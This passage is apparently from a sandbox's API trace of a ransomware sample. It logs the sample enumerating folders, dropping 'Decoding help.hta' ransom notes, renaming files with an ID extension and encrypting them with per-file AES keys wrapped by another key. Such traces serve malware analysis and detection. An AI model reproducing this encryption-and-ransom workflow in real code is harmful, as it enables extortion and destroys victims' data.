dwNumberOfBytesToMap=0x160) returned 0x4530000 [0044.119] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x394fbe4*, pdwDataLen=0x394fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x394fbe4*, pdwDataLen=0x394fcf8*=0x100) returned 1 [0047.080] CryptEncrypt (in: hKey=0x5d87d0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x4530000*, pdwDataLen=0x394fce4*=0x160, dwBufLen=0x160 | out: pbData=0x4530000*, pdwDataLen=0x394fce4*=0x160) returned 1 [0047.080] UnmapViewOfFile (lpBaseAddress=0x4530000) returned 1 [0047.082] CloseHandle (hObject=0x434) returned 1 [0047.082] CryptDestroyKey (hKey=0x5d87d0) returned 1 [0047.082] CryptReleaseContext (hProv=0x3449798, dwFlags=0x0) returned 1 [0047.082] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0047.082] WriteFile (in: hFile=0x430, lpBuffer=0x394fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x394fcf8, lpOverlapped=0x0 | out: lpBuffer=0x394fbe4*, lpNumberOfBytesWritten=0x394fcf8*=0x100, lpOverlapped=0x0) returned 1 [0047.610] WriteFile (in: hFile=0x430, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x394fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x394fcf8*=0x500, lpOverlapped=0x0) returned 1 [0047.610] CloseHandle (hObject=0x430) returned 1 [0047.611] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0051.174] FindNextFileW (in: hFindFile=0x5a5f30, lpFindFileData=0x394fd30 | out: lpFindFileData=0x394fd30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80340916, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Sample Pictures", cAlternateFileName="SAMPLE~1")) returned 1 [0051.174] lstrcmpW (lpString1=".", lpString2="Sample Pictures") returned -1 [0051.174] lstrcmpW (lpString1="..", lpString2="Sample Pictures") returned -1 [0051.174] lstrcmpiW (lpString1="windows", lpString2="Sample Pictures") returned 1 [0051.175] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\Public\\Pictures\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Public\\Pictures\\*.*") returned="\\\\?\\C:\\Users\\Public\\Pictures\\*.*" [0051.175] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Pictures\\*.*") returned 32 [0051.175] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Public\\Pictures\\", lpString2="Sample Pictures" | out: lpString1="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures") returned="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures" [0051.175] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\*.*") returned="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\*.*" [0051.175] GlobalMemoryStatus (in: lpBuffer=0x394fd10 | out: lpBuffer=0x394fd10) [0051.175] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5c78320, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x450 [0051.176] CloseHandle (hObject=0x450) returned 1 [0051.176] FindNextFileW (in: hFindFile=0x5a5f30, lpFindFileData=0x394fd30 | out: lpFindFileData=0x394fd30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80340916, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Sample Pictures", cAlternateFileName="SAMPLE~1")) returned 0 [0051.176] FindClose (in: hFindFile=0x5a5f30 | out: hFindFile=0x5a5f30) returned 1 Thread: id = 230 os_tid = 0x5b8 [0040.523] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Sun\\Java\\*.*", lpFindFileData=0x7b4fd30 | out: lpFindFileData=0x7b4fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x803771e0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x803771e0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x803771e0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a5f70 [0040.524] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0040.524] FindNextFileW (in: hFindFile=0x5a5f70, lpFindFileData=0x7b4fd30 | out: lpFindFileData=0x7b4fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x803771e0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x803771e0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x803771e0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.524] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0040.524] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0040.524] FindNextFileW (in: hFindFile=0x5a5f70, lpFindFileData=0x7b4fd30 | out: lpFindFileData=0x7b4fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x803771e0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x803771e0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x803771e0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Java Update", cAlternateFileName="JAVAUP~1")) returned 1 [0040.524] lstrcmpW (lpString1=".", lpString2="Java Update") returned -1 [0040.524] lstrcmpW (lpString1="..", lpString2="Java Update") returned -1 [0040.524] lstrcmpiW (lpString1="windows", lpString2="Java Update") returned 1 [0040.524] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Sun\\Java\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Sun\\Java\\*.*") returned="\\\\?\\C:\\ProgramData\\Sun\\Java\\*.*" [0040.524] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Sun\\Java\\*.*") returned 31 [0040.524] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Sun\\Java\\", lpString2="Java Update" | out: lpString1="\\\\?\\C:\\ProgramData\\Sun\\Java\\Java Update") returned="\\\\?\\C:\\ProgramData\\Sun\\Java\\Java Update" [0040.525] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Sun\\Java\\Java Update", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Sun\\Java\\Java Update\\*.*") returned="\\\\?\\C:\\ProgramData\\Sun\\Java\\Java Update\\*.*" [0040.525] GlobalMemoryStatus (in: lpBuffer=0x7b4fd10 | out: lpBuffer=0x7b4fd10) [0040.525] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x107a80b0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2bc [0040.525] CloseHandle (hObject=0x2bc) returned 1 [0040.525] FindNextFileW (in: hFindFile=0x5a5f70, lpFindFileData=0x7b4fd30 | out: lpFindFileData=0x7b4fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x803771e0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x803771e0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x803771e0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Java Update", cAlternateFileName="JAVAUP~1")) returned 0 [0040.525] FindClose (in: hFindFile=0x5a5f70 | out: hFindFile=0x5a5f70) returned 1 Thread: id = 231 os_tid = 0x58c [0043.221] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\*.*", lpFindFileData=0x1215fd30 | out: lpFindFileData=0x1215fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x50ea0e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xfa44d4a0, ftLastAccessTime.dwHighDateTime=0x1d305fd, ftLastWriteTime.dwLowDateTime=0xfa44d4a0, ftLastWriteTime.dwHighDateTime=0x1d305fd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d8a50 [0043.222] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0043.222] FindNextFileW (in: hFindFile=0x5d8a50, lpFindFileData=0x1215fd30 | out: lpFindFileData=0x1215fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x50ea0e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xfa44d4a0, ftLastAccessTime.dwHighDateTime=0x1d305fd, ftLastWriteTime.dwLowDateTime=0xfa44d4a0, ftLastWriteTime.dwHighDateTime=0x1d305fd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0043.222] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0043.222] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0043.222] FindNextFileW (in: hFindFile=0x5d8a50, lpFindFileData=0x1215fd30 | out: lpFindFileData=0x1215fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8ab1ae70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x9de525d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x9de525d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Cache", cAlternateFileName="")) returned 1 [0043.222] lstrcmpW (lpString1=".", lpString2="Cache") returned -1 [0043.222] lstrcmpW (lpString1="..", lpString2="Cache") returned -1 [0043.222] lstrcmpiW (lpString1="windows", lpString2="Cache") returned 1 [0043.222] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\*.*" [0043.222] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\*.*") returned 65 [0043.222] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\", lpString2="Cache" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache") returned="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache" [0043.222] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\*.*" [0043.222] GlobalMemoryStatus (in: lpBuffer=0x1215fd10 | out: lpBuffer=0x1215fd10) [0043.222] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x992aab8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x56c [0043.236] CloseHandle (hObject=0x56c) returned 1 [0043.236] FindNextFileW (in: hFindFile=0x5d8a50, lpFindFileData=0x1215fd30 | out: lpFindFileData=0x1215fd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8c015050, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xfa44d4a0, ftLastAccessTime.dwHighDateTime=0x1d305fd, ftLastWriteTime.dwLowDateTime=0x63c5e40, ftLastWriteTime.dwHighDateTime=0x1d305fe, nFileSizeHigh=0x0, nFileSizeLow=0x469bd5, dwReserved0=0x0, dwReserved1=0x0, cFileName="tokens.dat", cAlternateFileName="")) returned 1 [0043.236] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\*.*" [0043.236] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\*.*") returned 65 [0043.236] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Decoding help.hta") returned="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Decoding help.hta" [0043.236] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Decoding help.hta" (normalized: "c:\\programdata\\microsoft\\officesoftwareprotectionplatform\\decoding help.hta")) returned 0xffffffff [0043.236] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Decoding help.hta" (normalized: "c:\\programdata\\microsoft\\officesoftwareprotectionplatform\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x56c [0043.237] WriteFile (in: hFile=0x56c, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1215fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1215fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0043.237] CloseHandle (hObject=0x56c) returned 1 [0043.238] SetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0043.238] lstrcmpiW (lpString1="Decoding help.hta", lpString2="tokens.dat") returned -1 [0043.238] lstrlenW (lpString="tokens.dat") returned 10 [0043.238] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\*.*" [0043.238] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\*.*") returned 65 [0043.238] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\", lpString2="tokens.dat" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\tokens.dat") returned="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\tokens.dat" [0043.238] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\tokens.dat" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\tokens.dat") returned="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\tokens.dat" [0043.238] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\tokens.dat", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\tokens.dat.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\tokens.dat.[ID]g9uZrLhJaygpwRm1[ID]" [0043.238] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\tokens.dat" (normalized: "c:\\programdata\\microsoft\\officesoftwareprotectionplatform\\tokens.dat"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\tokens.dat.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\microsoft\\officesoftwareprotectionplatform\\tokens.dat.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0043.242] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\tokens.dat.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\microsoft\\officesoftwareprotectionplatform\\tokens.dat.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x56c [0043.242] CreateFileMappingA (hFile=0x56c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x4f8 [0043.242] CryptAcquireContextA (in: phProv=0x1215fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1215fcec*=0x3448d80) returned 1 [0043.243] CryptGenKey (in: hProv=0x3448d80, Algid=0x6610, dwFlags=0x1, phKey=0x1215fce8 | out: phKey=0x1215fce8*=0x5d8b90) returned 1 [0043.243] CryptExportKey (in: hKey=0x5d8b90, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x1215fbe4, pdwDataLen=0x1215fce4 | out: pbData=0x1215fbe4*, pdwDataLen=0x1215fce4*=0x2c) returned 1 [0043.243] MapViewOfFile (hFileMappingObject=0x4f8, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x100000) returned 0x12660000 [0043.279] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1215fbe4*, pdwDataLen=0x1215fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x1215fbe4*, pdwDataLen=0x1215fcf8*=0x100) returned 1 [0043.280] CryptEncrypt (in: hKey=0x5d8b90, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x12660000, pdwDataLen=0x1215fce4*=0x100000, dwBufLen=0x100000 | out: pbData=0x12660000*, pdwDataLen=0x1215fce4*=0x100000) returned 1 [0044.212] UnmapViewOfFile (lpBaseAddress=0x12660000) returned 1 [0044.223] CloseHandle (hObject=0x4f8) returned 1 [0044.223] CryptDestroyKey (hKey=0x5d8b90) returned 1 [0044.223] CryptReleaseContext (hProv=0x3448d80, dwFlags=0x0) returned 1 [0044.223] SetFilePointerEx (in: hFile=0x56c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0044.223] WriteFile (in: hFile=0x56c, lpBuffer=0x1215fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x1215fcf8, lpOverlapped=0x0 | out: lpBuffer=0x1215fbe4*, lpNumberOfBytesWritten=0x1215fcf8*=0x100, lpOverlapped=0x0) returned 1 [0044.245] WriteFile (in: hFile=0x56c, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x1215fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x1215fcf8*=0x500, lpOverlapped=0x0) returned 1 [0044.245] CloseHandle (hObject=0x56c) returned 1 [0049.259] SetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\tokens.dat.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0053.647] FindNextFileW (in: hFindFile=0x5d8a50, lpFindFileData=0x1215fd30 | out: lpFindFileData=0x1215fd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8c015050, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xfa44d4a0, ftLastAccessTime.dwHighDateTime=0x1d305fd, ftLastWriteTime.dwLowDateTime=0x63c5e40, ftLastWriteTime.dwHighDateTime=0x1d305fe, nFileSizeHigh=0x0, nFileSizeLow=0x469bd5, dwReserved0=0x0, dwReserved1=0x0, cFileName="tokens.dat", cAlternateFileName="")) returned 0 [0053.647] FindClose (in: hFindFile=0x5d8a50 | out: hFindFile=0x5d8a50) returned 1 Thread: id = 232 os_tid = 0x354 [0040.545] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Recorded TV\\*.*", lpFindFileData=0x1229fd30 | out: lpFindFileData=0x1229fd30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa597fc2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a5f70 [0040.545] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0040.546] FindNextFileW (in: hFindFile=0x5a5f70, lpFindFileData=0x1229fd30 | out: lpFindFileData=0x1229fd30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa597fc2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.546] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0040.546] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0040.546] FindNextFileW (in: hFindFile=0x5a5f70, lpFindFileData=0x1229fd30 | out: lpFindFileData=0x1229fd30*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0x89e5e11e, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x89e5e11e, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x50, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0040.546] lstrcpyW (in: lpString1=0x5d30608, lpString2="\\\\?\\C:\\Users\\Public\\Recorded TV\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Public\\Recorded TV\\*.*") returned="\\\\?\\C:\\Users\\Public\\Recorded TV\\*.*" [0040.546] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Recorded TV\\*.*") returned 35 [0040.546] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Public\\Recorded TV\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\Public\\Recorded TV\\Decoding help.hta") returned="\\\\?\\C:\\Users\\Public\\Recorded TV\\Decoding help.hta" [0040.546] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Public\\Recorded TV\\Decoding help.hta" (normalized: "c:\\users\\public\\recorded tv\\decoding help.hta")) returned 0xffffffff [0040.546] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Recorded TV\\Decoding help.hta" (normalized: "c:\\users\\public\\recorded tv\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0040.802] WriteFile (in: hFile=0x334, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1229fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1229fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0040.802] CloseHandle (hObject=0x334) returned 1 [0040.803] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Public\\Recorded TV\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0041.264] lstrcmpiW (lpString1="Decoding help.hta", lpString2="desktop.ini") returned -1 [0041.264] lstrlenW (lpString="desktop.ini") returned 11 [0041.264] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\Public\\Recorded TV\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Public\\Recorded TV\\*.*") returned="\\\\?\\C:\\Users\\Public\\Recorded TV\\*.*" [0041.264] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Recorded TV\\*.*") returned 35 [0041.264] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Public\\Recorded TV\\", lpString2="desktop.ini" | out: lpString1="\\\\?\\C:\\Users\\Public\\Recorded TV\\desktop.ini") returned="\\\\?\\C:\\Users\\Public\\Recorded TV\\desktop.ini" [0041.264] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\Public\\Recorded TV\\desktop.ini" | out: lpString1="\\\\?\\C:\\Users\\Public\\Recorded TV\\desktop.ini") returned="\\\\?\\C:\\Users\\Public\\Recorded TV\\desktop.ini" [0041.264] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Public\\Recorded TV\\desktop.ini", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\Public\\Recorded TV\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\Public\\Recorded TV\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]" [0041.264] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Recorded TV\\desktop.ini" (normalized: "c:\\users\\public\\recorded tv\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Recorded TV\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\public\\recorded tv\\desktop.ini.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0041.270] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Recorded TV\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\public\\recorded tv\\desktop.ini.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x45c [0041.270] CreateFileMappingA (hFile=0x45c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x2bc [0041.270] CryptAcquireContextA (in: phProv=0x1229fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1229fcec*=0x34499b8) returned 1 [0043.836] CryptGenKey (in: hProv=0x34499b8, Algid=0x6610, dwFlags=0x1, phKey=0x1229fce8 | out: phKey=0x1229fce8*=0x5a5ff0) returned 1 [0043.836] CryptExportKey (in: hKey=0x5a5ff0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x1229fbe4, pdwDataLen=0x1229fce4 | out: pbData=0x1229fbe4*, pdwDataLen=0x1229fce4*=0x2c) returned 1 [0043.836] MapViewOfFile 